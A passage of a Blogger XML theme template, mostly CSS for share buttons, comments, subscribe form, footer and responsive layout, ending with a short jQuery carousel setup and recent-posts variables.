1274}
1275/* ######## Share widget Css ######################### */
1276.footer-meta .share-box {
1277position: relative;
1278padding: 10px 0;
1279 text-align: center;
1280}
1281.footer-meta .share-title {
1282 border-bottom: 2px solid #eee;
1283 color: #010101;
1284 display: inline-block;
1285 padding-bottom: 7px;
1286 font-size: 15px;
1287 font-weight: 500;
1288 clear: both;
1289 margin: 0 0 10px;
1290 position: relative;
1291}
1292.footer-meta .share-title:after {
1293 position: absolute;
1294 left: 50%;
1295 margin-left: -5px;
1296 bottom: -5px;
1297 content: "";
1298 display: block;
1299 width: 0;
1300 height: 0;
1301 border-left: 5px solid transparent;
1302 border-right: 5px solid transparent;
1303 border-top: 5px solid #eee;
1304}
1305.footer-meta .share-art {
1306 float: none;
1307 clear: both;
1308padding: 0;
1309padding-top: 0;
1310font-size: 13px;
1311font-weight: 400;
1312text-transform: capitalize;
1313}
1314.footer-meta .share-art a {
1315color: #fff;
1316padding: 3px 8px;
1317margin-left: 4px;
1318border-radius: 2px;
1319display: inline-block;
1320margin-right: 0;
1321background: #010101;
1322}
1323.footer-meta .share-art a:hover{color:#fff}
1324.footer-meta .share-art .fac-art{background:#3b5998}
1325.footer-meta .share-art .fac-art:hover{background:rgba(49,77,145,0.7)}
1326.footer-meta .share-art .twi-art{background:#00acee}
1327.footer-meta .share-art .twi-art:hover{background:rgba(7,190,237,0.7)}
1328.footer-meta .share-art .goo-art{background:#db4a39}
1329.footer-meta .share-art .goo-art:hover{background:rgba(221,75,56,0.7)}
1330.footer-meta .share-art .pin-art{background:#CA2127}
1331.footer-meta .share-art .pin-art:hover{background:rgba(202,33,39,0.7)}
1332.footer-meta .share-art .lin-art{background:#0077B5}
1333.footer-meta .share-art .lin-art:hover{background:rgba(0,119,181,0.7)}
1334/* ######## Comment Form Widget ######################### */
1335.post-feeds .feed-links {
1336display: none;
1337}
1338iframe.blogger-iframe-colorize,
1339iframe.blogger-comment-from-post {
1340height: 260px!important;
1341background: #fff;
1342}
1343.comment-form {
1344overflow:hidden;
1345}
1346.comments h3 {
1347line-height:normal;
1348text-transform:uppercase;
1349color:#333;
1350font-weight:bold;
1351margin:0 0 20px 0;
1352font-size:14px;
1353padding:0 0 0 0;
1354}
1355h4#comment-post-message {
1356display:none;
1357margin:0 0 0 0;
1358}
1359.comments{
1360clear:both;
1361margin-top:10px;
1362margin-bottom:0;
1363background: #ffffff;
1364border: 1px solid #eaeaea;
1365}
1366.comments h4{
1367background: #ffffff;
1368 color: #333333;
1369 border: 1px solid #eeeeee;
1370 border-top: 3px solid #fed130;
1371 border-bottom-color: #e9e9e9;
1372 font-size: 18px;
1373 padding: 18px 30px;
1374 letter-spacing: 1.5px;
1375 text-transform: capitalize;
1376 position: relative;
1377 text-align: center;
1378}
1379
1380.comments .comments-content{
1381font-size:13px;
1382margin-bottom:8px;
1383 padding: 0 15px;
1384}
1385.comments .comments-content .comment-thread ol{
1386text-align:left;
1387margin:13px 0;
1388padding:0
1389}
1390.comments .avatar-image-container {
1391background:#fff;
1392border:1px solid #DDD;
1393overflow:hidden;
1394padding:6px;
1395border-radius: 50%;
1396}
1397.comments .avatar-image-container img {
1398border-radius:50%;
1399}
1400.comments .comment-block{
1401position:relative;
1402background:#fff;
1403padding:15px;
1404margin-left:60px;
1405border-left:3px solid #ddd;
1406border-top:1px solid #DDD;
1407border-right:1px solid #DDD;
1408border-bottom:1px solid #DDD;
1409}
1410.comments .comment-block:before {
1411content:"";
1412width:0px;
1413height:0px;
1414position:absolute;
1415right:100%;
1416top:14px;
1417border-width:10px;
1418border-style:solid;
1419border-color:transparent #DDD transparent transparent;
1420display:block;
1421}
1422.comments .comments-content .comment-replies{
1423margin:8px 0;
1424margin-left:60px
1425}
1426.comments .comments-content .comment-thread:empty{
1427display:none
1428}
1429.comments .comment-replybox-single {
1430background:#f0f0f0;
1431padding:0;
1432margin:8px 0;
1433margin-left:60px
1434}
1435.comments .comment-replybox-thread {
1436background:#f0f0f0;
1437margin:8px 0 0 0;
1438padding:0;
1439}
1440.comments .comments-content .comment{
1441margin-bottom:6px;
1442padding:0
1443}
1444.comments .comments-content .comment:first-child {
1445padding:0;
1446margin:0
1447}
1448.comments .comments-content .comment:last-child {
1449padding:0;
1450margin:0
1451}
1452.comments .comment-thread.inline-thread .comment, .comments .comment-thread.inline-thread .comment:last-child {
1453margin:0px 0px 5px 30%
1454}
1455.comment .comment-thread.inline-thread .comment:nth-child(6) {
1456margin:0px 0px 5px 25%;
1457}
1458.comment .comment-thread.inline-thread .comment:nth-child(5) {
1459margin:0px 0px 5px 20%;
1460}
1461.comment .comment-thread.inline-thread .comment:nth-child(4) {
1462margin:0px 0px 5px 15%;
1463}
1464.comment .comment-thread.inline-thread .comment:nth-child(3) {
1465margin:0px 0px 5px 10%;
1466}
1467.comment .comment-thread.inline-thread .comment:nth-child(2) {
1468margin:0px 0px 5px 5%;
1469}
1470.comment .comment-thread.inline-thread .comment:nth-child(1) {
1471margin:0px 0px 5px 0;
1472}
1473.comments .comments-content .comment-thread{
1474margin:0;
1475padding:0
1476}
1477.comments .comments-content .inline-thread{
1478background:#fff;
1479border:1px solid #DDD;
1480padding:15px;
1481margin:0
1482}
1483.comments .comments-content .icon.blog-author {
1484display:inline;
1485}
1486.comments .comments-content .icon.blog-author:after {
1487content: "Author";
1488background: #fed130;
1489color: #fff;
1490font-size: 11px;
1491padding: 2px 5px;
1492}
1493.comment-header {
1494text-transform:uppercase;
1495font-size:12px;
1496}
1497.comments .comments-content .datetime {
1498margin-left: 6px;
1499}
1500.comments .comments-content .datetime a {
1501color:#888;
1502}
1503.comments .comment .comment-actions a {
1504display:inline-block;
1505color:#333;
1506font-weight:bold;
1507font-size:10px;
1508line-height:15px;
1509margin:4px 8px 0 0;
1510}
1511.comments .continue a {
1512color:#333;
1513display:inline-block;
1514font-size:10px;
1515}
1516.comments .comment .comment-actions a:hover, .comments .continue a:hover{
1517text-decoration:underline;
1518}
1519/* ######## Subscribe Css ######################### */
1520.featuresub {
1521margin:0 auto;
1522}
1523.sub-wrap {
1524position: relative;
1525 padding: 20px 0;
1526 background:#fed130;
1527 overflow: hidden;
1528 border-top: 4px solid rgba(228, 178, 0, 0.39);
1529}
1530.subscribe-wrapper {
1531color: #fff;
1532font-size: 16px;
1533line-height: normal;
1534margin: 0;
1535text-align: center;
1536text-transform: none;
1537font-weight: 400;
1538width: 100%
1539}
1540.subscribe-form {
1541clear: both;
1542display: block;
1543overflow: hidden
1544}
1545form.subscribe-form {
1546clear: both;
1547display: block;
1548margin: 0;
1549width: auto;
1550overflow: hidden
1551}
1552.subscribe-css-email-field {
1553background: #fff;
1554color: #000;
1555margin: 10px 0;
1556padding: 15px 20px;
1557width: 35%;
1558border: 0
1559}
1560.subscribe-css-email-button {
1561background: #fff;
1562color: #000;
1563cursor: pointer;
1564font-weight: 700;
1565padding: 14px 30px;
1566margin-left: 15px;
1567text-transform: none;
1568font-size: 16px;
1569border: 0;
1570border-radius: 3px;
1571transition: all .6s;
1572}
1573.subscribe-css-email-button:hover {
1574color: #555;
1575}
1576#subscribe-css p.subscribe-note {
1577margin: 16px;
1578text-align: center;
1579color: #fff;
1580font-size: 180%;
1581font-weight: 400;
1582line-height: normal;
1583}
1584#subscribe-css p.subscribe-note span {
1585position: relative;
1586overflow: hidden;
1587font-weight: 700;
1588transition: all .5s;
1589}
1590#subscribe-css p.subscribe-note span.itatu {
1591font-style: italic;
1592 color: #fff;
1593 text-transform: lowercase;
1594 font-family: Handlee;
1595}
1596#subscribe-css p.subscribe-note span.itatu:before,
1597#subscribe-css p.subscribe-note span.itatu:after {
1598display: none
1599}
1600#subscribe-css p.subscribe-note span:before {
1601content: '';
1602position: absolute;
1603bottom: -2px;
1604left: 0;
1605width: 0;
1606height: 3px;
1607margin: 10px 0 0;
1608background: #fff;
1609transition: all .5s
1610}
1611#subscribe-css:hover p.subscribe-note span:before {
1612width: 100%;
1613}
1614/* ######## Instagram Widget Css ######################### */
1615.instag ul.thumbnails > li {
1616width:32% !important;
1617}
1618.instag ul.thumbnails > li img:hover {
1619opacity:.8;
1620}
1621.instag ul li {
1622margin:0;
1623padding-bottom:0;
1624border-bottom:none;
1625}
1626#instafeed{width:100%;display:block;margin:0;padding:0;line-height:0}
1627#instafeed img{height:auto;width:100%}
1628#instafeed a{padding:0;margin:0;display:inline-block;position:relative}
1629#instafeed li{width:16.666%;display:inline-block;margin:0!important;padding:0!important}
1630#instafeed .insta-likes{width:100%;height:100%;margin-top:-100%;opacity:0;text-align:center;letter-spacing:1px;background:rgba(255,255,255,0.4);position:absolute;text-shadow:2px 2px 8px #fff;font:normal 400 11px Montserrat,sans-serif;color:#222;line-height:normal;transition:all .35s ease-out;-o-transition:all .35s ease-out;-moz-transition:all .35s ease-out;-webkit-transition:all .35s ease-out}
1631#instafeed a:hover .insta-likes{opacity:1}
1632.featureinsta {
1633margin: auto;
1634position: relative;
1635transition: all 1s ease;
1636height: auto;
1637overflow: hidden;
1638}
1639/* ######## Footer Css ######################### */
1640.foot-bar-social {
1641padding: 10px 0;
1642}
1643.foot-bar-social li {
1644padding: 0;
1645 display: inline-block;
1646 float: none;
1647margin-right: 5px;
1648;
1649}
1650.foot-bar-social .widget ul {
1651padding: 0;
1652}
1653.foot-bar-social .LinkList ul {
1654text-align: center;
1655}
1656.foot-bar-social #social a {
1657display: block;
1658width: 30px;
1659height: 30px;
1660line-height: 30px;
1661font-size: 15px;
1662color: #ebebeb;
1663}
1664.foot-bar-social #social a:before {
1665display: inline-block;
1666font: normal normal normal 22px/1 FontAwesome;
1667font-size: inherit;
1668font-style: normal;
1669font-weight: 400;
1670-webkit-font-smoothing: antialiased;
1671-moz-osx-font-smoothing: grayscale;
1672}
1673.foot-bar-social .bloglovin:before{content:"\f004"}
1674.foot-bar-social .facebook:before{content:"\f09a"}
1675.foot-bar-social .twitter:before{content:"\f099"}
1676.foot-bar-social .gplus:before{content:"\f0d5"}
1677.foot-bar-social .rss:before{content:"\f09e"}
1678.foot-bar-social .youtube:before{content:"\f167"}
1679.foot-bar-social .skype:before{content:"\f17e"}
1680.foot-bar-social .stumbleupon:before{content:"\f1a4"}
1681.foot-bar-social .tumblr:before{content:"\f173"}
1682.foot-bar-social .vine:before{content:"\f1ca"}
1683.foot-bar-social .stack-overflow:before{content:"\f16c"}
1684.foot-bar-social .linkedin:before{content:"\f0e1"}
1685.foot-bar-social .dribbble:before{content:"\f17d"}
1686.foot-bar-social .soundcloud:before{content:"\f1be"}
1687.foot-bar-social .behance:before{content:"\f1b4"}
1688.foot-bar-social .digg:before{content:"\f1a6"}
1689.foot-bar-social .instagram:before{content:"\f16d"}
1690.foot-bar-social .pinterest:before{content:"\f0d2"}
1691.foot-bar-social .delicious:before{content:"\f1a5"}
1692.foot-bar-social .codepen:before{content:"\f1cb"}
1693#jugas_footer {
1694 background-image: url(https://4.bp.blogspot.com/-Nn1ZQRFxaUg/WVVRsaG6RJI/AAAAAAAAQoo/0mKRKLuXTfM9L3G4GMUcNGWQ8oQ1bvqpwCLcBGAs/s1600/MntBkGrnd.png);
1695 background-color: #333134;
1696 background-attachment: fixed;
1697 transform: translate3d(0px, 0px, 0px);
1698 background-position: top;
1699 background-size: cover;
1700 background-repeat: no-repeat no-repeat;
1701 color: #BABABA;
1702 font-weight: 300;
1703 padding: 50px 0px;
1704}
1705.copy-container {
1706 margin: 0 auto;
1707 overflow: hidden;
1708}
1709.jugas_footer_copyright a {
1710 color: #f4f4f4;
1711}
1712.jugas_footer_copyright {
1713 text-align: center;
1714}
1715/* ######## Custom Widget Css ######################### */
1716#ads-blog .widget {
1717width: 728px;
1718max-height: 90px;
1719padding: 0;
1720margin: 0px auto 20px!important;
1721max-width: 100%;
1722box-sizing: border-box;
1723}
1724#ads-home-top {
1725margin-top: 15px;
1726}
1727.cloud-label-widget-content {
1728display: inline-block;
1729text-align: left;
1730}
1731.cloud-label-widget-content .label-size {
1732display: inline-block;
1733float: left;
1734font-size: 16px;
1735line-height: normal;
1736margin: 0 5px 5px 0;
1737opacity: 1
1738}
1739.cloud-label-widget-content .label-size a {
1740background: #fff;
1741color: #878787;
1742float: left;
1743border: 3px double #eee;
1744font-weight: 400;
1745line-height: 100%;
1746margin: 0;
1747padding: 7px 8px;
1748text-transform: capitalize;
1749transition: all .6s;
1750}
1751.cloud-label-widget-content .label-size a:hover {
1752color: #000;
1753}
1754.cloud-label-widget-content .label-size a:hover,
1755.cloud-label-widget-content .label-size a:active {
1756background: #fff;
1757color: #fed130;
1758}
1759.cloud-label-widget-content .label-size .label-count {
1760background: #F86E7D;
1761color: #fff;
1762white-space: nowrap;
1763display: inline-block;
1764padding: 6px 8px;
1765margin-left: -3px;
1766line-height: normal;
1767border-radius: 0 2px 2px 0
1768}
1769.flickr_widget .flickr_badge_image{float:left;margin-bottom:5px;margin-right:10px;overflow:hidden;display:inline-block}
1770.flickr_widget .flickr_badge_image:nth-of-type(4),.flickr_widget .flickr_badge_image:nth-of-type(8),.flickr_widget .flickr_badge_image:nth-of-type(12){margin-right:0}
1771.flickr_widget .flickr_badge_image img{max-width:64px;height:auto}
1772.flickr_widget .flickr_badge_image img:hover{opacity:.5}
1773.label-size-1,
1774.label-size-2 {
1775opacity: 100
1776}
1777.list-label-widget-content li {
1778display: block;
1779padding: 8px 0;
1780border-bottom: 1px solid #555;
1781position: relative
1782}
1783.list-label-widget-content li a:before {
1784content: '\203a';
1785position: absolute;
1786left: 0px;
1787top: 2px;
1788font-size: 22px;
1789color: #f1a18e
1790}
1791.list-label-widget-content li a {
1792color: #fff;
1793font-size: 16px;
1794padding-left: 20px;
1795font-weight: 400;
1796text-transform: uppercase
1797}
1798.list-label-widget-content li span:last-child {
1799color: #f1a18e;
1800font-size: 12px;
1801font-weight: 700;
1802position: absolute;
1803top: 9px;
1804right: 0
1805}
1806.PopularPosts .item-thumbnail{margin:0 15px 0 0 !important;width:90px;height:65px;float:left;overflow:hidden; position: relative}
1807.PopularPosts .item-thumbnail a{position:relative;display:block;overflow:hidden;line-height:0}
1808.PopularPosts ul li img{width:90px;height:65px;object-fit:cover;padding:0;transition:all .3s ease}
1809.PopularPosts .widget-content ul li{overflow:hidden;padding:10px 0;border-top:1px solid #f2f2f2}
1810.sidebar .PopularPosts .widget-content ul li:first-child,.sidebar .custom-widget li:first-child,.tab-widget .PopularPosts .widget-content ul li:first-child,.tab-widget .custom-widget li:first-child{padding-top:0;border-top:0}
1811.sidebar .PopularPosts .widget-content ul li:last-child,.sidebar .custom-widget li:last-child,.tab-widget .PopularPosts .widget-content ul li:last-child,.tab-widget .custom-widget li:last-child{padding-bottom:0}
1812.PopularPosts ul li a{color:#333333;font-weight:400;font-size:16px;line-height:1.4em;transition:color .3s; font-family: 'Handlee';}
1813.PopularPosts ul li a:hover{color:#fed130}
1814.PopularPosts .item-title{margin:0 0 4px;padding:0;line-height:0}
1815.item-snippet{display:none;font-size:0;padding-top:0}
1816.PopularPosts ul {
1817counter-reset: popularcount;
1818margin: 0;
1819padding: 0;
1820}
1821.PopularPosts .item-thumbnail::before {
1822background: rgba(0, 0, 0, 0.3);
1823bottom: 0px;
1824content: "";
1825height: 100px;
1826width: 100px;
1827left: 0px;
1828right: 0px;
1829margin: 0px auto;
1830position: absolute;
1831z-index: 3;
1832}
1833/* ######## Responsive Css ######################### */
1834@media only screen and (max-width: 1200px) {
1835.featured-slider-wrap {
1836width:auto !important;
1837}
1838.row {
1839width: 96%;
1840margin: 0 auto;
1841float: none;
1842}
1843}
1844@media only screen and (max-width: 980px) {
1845#main-wrapper, #sidebar-wrapper {
1846float: none;
1847clear: both;
1848width: 100%;
1849margin: 0 auto;
1850}
1851#main-wrapper {
1852max-width: 100%;
1853}
1854#sidebar-wrapper {
1855padding-top: 20px;
1856}
1857.overlay a {
1858float: right;
1859margin: 30px 0;
1860}
1861.overlay h3 {
1862float: left;
1863}
1864}
1865@media screen and (max-width: 880px) {
1866#nav1, #nav {
1867display: none;
1868}
1869.home #header-wrapper {
1870margin-bottom: 10px;
1871}
1872.selectnav {
1873width: auto;
1874color: #222;
1875background: #f4f4f4;
1876border: 1px solid rgba(255,255,255,0.1);
1877position: relative;
1878border: 0;
1879padding: 6px 10px!important;
1880margin: 5px 0;
1881}
1882.selectnav {
1883display: block;
1884width: 100%;
1885max-width:200px;
1886}
1887.nav-menu .selectnav {
1888 display: inline-block;
1889}
1890.item #content-wrapper {
1891padding: 0 0 30px;
1892}
1893}
1894@media only screen and (max-width: 768px) {
1895.owl-prev, .owl-next {
1896top: 25px;
1897}
1898#search-bar {
1899 display: none;
1900}
1901.top-bar-social {
1902float: none;
1903width: 100%;
1904clear: both;
1905overflow: hidden;
1906}
1907.top-bar-menu {
1908float: none;
1909width: 100%;
1910clear: both;
1911margin-top: 0;
1912}
1913.top-bar-social li {
1914display: inline-block;
1915float: none;
1916}
1917.share-art span {
1918display: none;
1919}
1920.ops-404 {
1921width: 80%!important;
1922}
1923.title-404 {
1924font-size: 160px!important;
1925}
1926.overlay {
1927display:none;
1928visibility:hidden;
1929}
1930.selectnav {
1931margin: 0 auto;
1932}
1933#header {
1934padding: 10px 0px 0;
1935}
1936.fot-site-name {
1937 display: none;
1938}
1939}
1940@media only screen and (max-width: 480px) {
1941#label_with_thumbs .widget-thumb {
1942height: 380px;
1943}
1944.block-image .thumb, .block-image .a {
1945height:300px;
1946}
1947.index .post h2,.archive .post h2 {
1948line-height: 34px;
1949font-size: 23px;
1950}
1951h1.post-title {
1952font-size: 22px;
1953margin-bottom: 10px;
1954}
1955#sidebar-wrapper {
1956max-width: 100%;
1957}
1958.second-meta .post-cmm {
1959 float: none;
1960 margin: 0 auto;
1961 margin-top: 10px;
1962 display: block;
1963 padding: 0;
1964}
1965.read-more-wrap, .second-meta .share-art {
1966float: none !important;
1967clear: both;
1968display: block;
1969text-align: center;
1970}
1971.read-more-wrap {
1972margin-top: 15px;
1973}
1974.about-widget-image {
1975overflow: hidden;
1976}
1977.share-title{
1978display:none;
1979}
1980.flickr_widget .flickr_badge_image:nth-of-type(4), .flickr_widget .flickr_badge_image:nth-of-type(8), .flickr_widget .flickr_badge_image:nth-of-type(12) {
1981margin-right: 10px;
1982}
1983.related li {
1984width: 100%;
1985margin:0 auto;
1986}
1987.index .post-outer {
1988padding:0 0 10px 0;
1989}
1990.wid-thumb {
1991height: 300px;
1992}
1993.breadcrumbs {
1994display: none;
1995}
1996.subscribe-css-email-field {
1997 width: 100%;
1998}
1999}
2000@media only screen and (max-width: 360px) {
2001#meta-post {
2002position: relative;
2003overflow: hidden;
2004display: block;
2005}
2006#meta-post:after {
2007display: none;
2008}
2009.label_with_thumbs strong {
2010font-size: 23px;
2011}
2012.second-meta {
2013margin-bottom: 10px !important;
2014position: relative;
2015overflow: hidden;
2016float: left;
2017width: 100%;
2018}
2019.slider-con {
2020width: 100%;
2021}
2022.title-404 {
2023font-size: 150px!important;
2024}
2025.second-meta {
2026box-sizing:border-box;
2027}
2028.second-meta .share-art a {
2029margin-right: 4px;
2030margin-left: 4px;
2031}
2032.Header .description p{display:none}
2033.tag, #meta-post {
2034 float: none;
2035 text-align: center;
2036 clear: both;
2037}
2038#meta-post {
2039 display: block;
2040 margin-top: 10px;
2041}
2042}
2043
2044@media only screen and (max-width: 300px) {
2045#sidebar-wrapper, .featured-slider-wrap {display:none}
2046.archive .post h2,.index .post h2 {
2047line-height: 29px!important;
2048font-size: 15px!important;
2049}
2050article {
2051overflow: hidden;
2052}
2053.label_with_thumbs strong {
2054font-size: 17px;
2055line-height: 1.4em;
2056}
2057#blog-pager {
2058padding: 0;
2059margin: 0;
2060}
2061.index .snippets,.archive .snippets,.sora-author-box img,.share-box .post-author {
2062display: none;
2063}
2064.share-art, .share-box .post-author {
2065float: none;
2066margin: 0 auto;
2067text-align: center;
2068clear: both;
2069}
2070.read-more-wrap, .post-labels {
2071float: none !important;
2072clear: both;
2073display: block;
2074text-align: center;
2075}
2076.ops-404 {
2077font-size: 20px!important;
2078}
2079.title-404 {
2080font-size: 120px!important;
2081}
2082h1.post-title {
2083font-size: 17px;
2084}
2085.share-box {
2086overflow: hidden;
2087}
2088.top-bar-social #social a {
2089width: 24px;
2090height: 24px;
2091line-height: 24px;
2092}
2093.second-meta .share-art a {
2094padding: 5px;
2095}
2096}
2097
2098]]></b:skin>
2099<style>
2100/*-------Typography and ShortCodes-------*/
2101.firstcharacter{float:left;color:#27ae60;font-size:75px;line-height:60px;padding-top:4px;padding-right:8px;padding-left:3px}.post-body h1,.post-body h2,.post-body h3,.post-body h4,.post-body h5,.post-body h6{margin-bottom:15px;color:#2c3e50}blockquote{font-style:italic;color:#888;border-left:5px solid #27ae60;margin-left:0;padding:10px 15px}blockquote:before{content:'\f10d';display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;margin-right:10px;color:#888}blockquote:after{content:'\f10e';display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;margin-left:10px;color:#888}.button{background-color:#2c3e50;float:left;padding:5px 12px;margin:5px;color:#fff;text-align:center;border:0;cursor:pointer;border-radius:3px;display:block;text-decoration:none;font-weight:400;transition:all .3s ease-out !important;-webkit-transition:all .3s ease-out !important}a.button{color:#fff}.button:hover{background-color:#27ae60;color:#fff}.button.small{font-size:12px;padding:5px 12px}.button.medium{font-size:16px;padding:6px 15px}.button.large{font-size:18px;padding:8px 18px}.small-button{width:100%;overflow:hidden;clear:both}.medium-button{width:100%;overflow:hidden;clear:both}.large-button{width:100%;overflow:hidden;clear:both}.demo:before{content:"\f06e";margin-right:5px;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.download:before{content:"\f019";margin-right:5px;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.buy:before{content:"\f09d";margin-right:5px;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.visit:before{content:"\f14c";margin-right:5px;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.widget .post-body ul,.widget .post-body ol{line-height:1.5;font-weight:400}.widget .post-body li{margin:5px 0;padding:0;line-height:1.5}.post-body ul li:before{content:"\f105";margin-right:5px;font-family:fontawesome}pre{font-family:Monaco, "Andale Mono", "Courier New", Courier, monospace;background-color:#2c3e50;background-image:-webkit-linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:-moz-linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:-ms-linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:-o-linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);-webkit-background-size:100% 50px;-moz-background-size:100% 50px;background-size:100% 50px;line-height:25px;color:#f1f1f1;position:relative;padding:0 7px;margin:15px 0 10px;overflow:hidden;word-wrap:normal;white-space:pre;position:relative}pre:before{content:'Code';display:block;background:#F7F7F7;margin-left:-7px;margin-right:-7px;color:#2c3e50;padding-left:7px;font-weight:400;font-size:14px}pre code,pre .line-number{display:block}pre .line-number a{color:#27ae60;opacity:0.6}pre .line-number span{display:block;float:left;clear:both;width:20px;text-align:center;margin-left:-7px;margin-right:7px}pre .line-number span:nth-child(odd){background-color:rgba(0, 0, 0, 0.11)}pre .line-number span:nth-child(even){background-color:rgba(255, 255, 255, 0.05)}pre .cl{display:block;clear:both}#contact{background-color:#fff;margin:30px 0 !important}#contact .contact-form-widget{max-width:100% !important}#contact .contact-form-name,#contact .contact-form-email,#contact .contact-form-email-message{background-color:#FFF;border:1px solid #eee;border-radius:3px;padding:10px;margin-bottom:10px !important;max-width:100% !important}#contact .contact-form-name{width:47.7%;height:50px}#contact .contact-form-email{width:49.7%;height:50px}#contact .contact-form-email-message{height:150px}#contact .contact-form-button-submit{max-width:100%;width:100%;z-index:0;margin:4px 0 0;padding:10px !important;text-align:center;cursor:pointer;background:#27ae60;border:0;height:auto;-webkit-border-radius:2px;-moz-border-radius:2px;-ms-border-radius:2px;-o-border-radius:2px;border-radius:2px;text-transform:uppercase;-webkit-transition:all .2s ease-out;-moz-transition:all .2s ease-out;-o-transition:all .2s ease-out;-ms-transition:all .2s ease-out;transition:all .2s ease-out;color:#FFF}#contact .contact-form-button-submit:hover{background:#2c3e50}#contact .contact-form-email:focus,#contact .contact-form-name:focus,#contact .contact-form-email-message:focus{box-shadow:none !important}.alert-message{position:relative;display:block;background-color:#FAFAFA;padding:20px;margin:20px 0;-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;color:#2f3239;border:1px solid}.alert-message p{margin:0 !important;padding:0;line-height:22px;font-size:13px;color:#2f3239}.alert-message span{font-size:14px !important}.alert-message i{font-size:16px;line-height:20px}.alert-message.success{background-color:#f1f9f7;border-color:#e0f1e9;color:#1d9d74}.alert-message.success a,.alert-message.success span{color:#1d9d74}.alert-message.alert{background-color:#DAEFFF;border-color:#8ED2FF;color:#378FFF}.alert-message.alert a,.alert-message.alert span{color:#378FFF}.alert-message.warning{background-color:#fcf8e3;border-color:#faebcc;color:#8a6d3b}.alert-message.warning a,.alert-message.warning span{color:#8a6d3b}.alert-message.error{background-color:#FFD7D2;border-color:#FF9494;color:#F55D5D}.alert-message.error a,.alert-message.error span{color:#F55D5D}.fa-check-circle:before{content:"\f058"}.fa-info-circle:before{content:"\f05a"}.fa-exclamation-triangle:before{content:"\f071"}.fa-exclamation-circle:before{content:"\f06a"}.post-table table{border-collapse:collapse;width:100%}.post-table th{background-color:#eee;font-weight:bold}.post-table th,.post-table td{border:0.125em solid #333;line-height:1.5;padding:0.75em;text-align:left}@media (max-width: 30em){.post-table thead tr{position:absolute;top:-9999em;left:-9999em}.post-table tr{border:0.125em solid #333;border-bottom:0}.post-table tr + tr{margin-top:1.5em}.post-table tr,.post-table td{display:block}.post-table td{border:none;border-bottom:0.125em solid #333;padding-left:50%}.post-table td:before{content:attr(data-label);display:inline-block;font-weight:bold;line-height:1.5;margin-left:-100%;width:100%}}@media (max-width: 20em){.post-table td{padding-left:0.75em}.post-table td:before{display:block;margin-bottom:0.75em;margin-left:0}}
2102.FollowByEmail {
2103 clear: both;
2104}
2105.widget .post-body ol {
2106 padding: 0 0 0 15px;
2107}
2108.post-body ul li {
2109 list-style: none;
2110}
2111</style>
2112<b:template-skin><![CDATA[
2113/*------Layout (No Edit)----------*/
2114body#layout #outer-wrapper {
2115 padding: 0;
2116 width: 800px
2117}
2118body#layout .section h4 {
2119 color: #333!important
2120}
2121body#layout #content-wrapper {
2122 margin: 0 auto
2123}
2124
2125body#layout #main-wrapper {
2126 float: left;
2127 width: 70%;
2128 margin: 0;
2129 padding: 0
2130}
2131
2132body#layout #sidebar-wrapper {
2133 float: right;
2134 width: 30%;
2135 margin: 0;
2136 padding: 5px 0 0;
2137 background-color: #f8e244!important;
2138display:block !important;
2139}
2140body#layout #sidebar-wrapper .section {
2141 background-color: #fff;
2142 border: 1px solid #fff
2143}
2144body#layout #sidebar-wrapper .section .widget-content {
2145 border-color: #5a7ea2!important
2146}
2147body#layout #sidebar-wrapper .section .draggable-widget .widget-wrap2 {
2148 background-color: #5a7ea2!important
2149}
2150
2151body#layout #main-wrapper #main {
2152 margin-right: 4px;
2153 background-color: #5a7ea2;
2154 border-color: #34495e
2155}
2156body#layout #main-wrapper #main h4 {
2157 color: #fff!important
2158}
2159body#layout .layout-widget-description {
2160 display: none!important
2161}
2162body#layout #Blog1 .widget-content {
2163 border-color: #34495e
2164}
2165/*------Layout (end)----------*/
2166]]></b:template-skin>
2167<script type='text/javascript'>
2168//<![CDATA[
2169$(document).ready(function() {
2170 $(".label_with_thumbs").owlCarousel({
2171 items: 4,
2172smartSpeed: 550,
2173 navigation: true,
2174 navigationText: ["", ""],
2175 itemsDesktop: [1000, 1],
2176 itemsDesktopSmall: [647, 1],
2177 itemsTablet: [396, 1],
2178 autoPlay: false,
2179 autoPlay: 5000,
2180 itemsMobile: false,
2181 pagination: true,
2182 responsive: {
2183 0: {
2184 items: 1,
2185 nav: true
2186 },
2187 601: {
2188 items: 2,
2189 nav: false
2190 },
2191 800: {
2192 items: 3,
2193 nav: false
2194 },
2195 980: {
2196 items: 4,
2197 nav: true
2198 }
2199 }
2200
2201 // "singleItem:true" is a shortcut for:
2202 // items : 1,
2203 // itemsDesktop : false,
2204 // itemsDesktopSmall : false,
2205 // itemsTablet: false,
2206 // itemsMobile : false
2207 });
2208});
2209var numposts = 8;
2210 var showpostthumbnails = true;
2211 var displaymore = false;
2212 var displayseparator = true;
2213 var showcommentnum = true;
2214 var showpostdate = true;
2215 var showpostsummary = true;
2216 var numchars = 100;
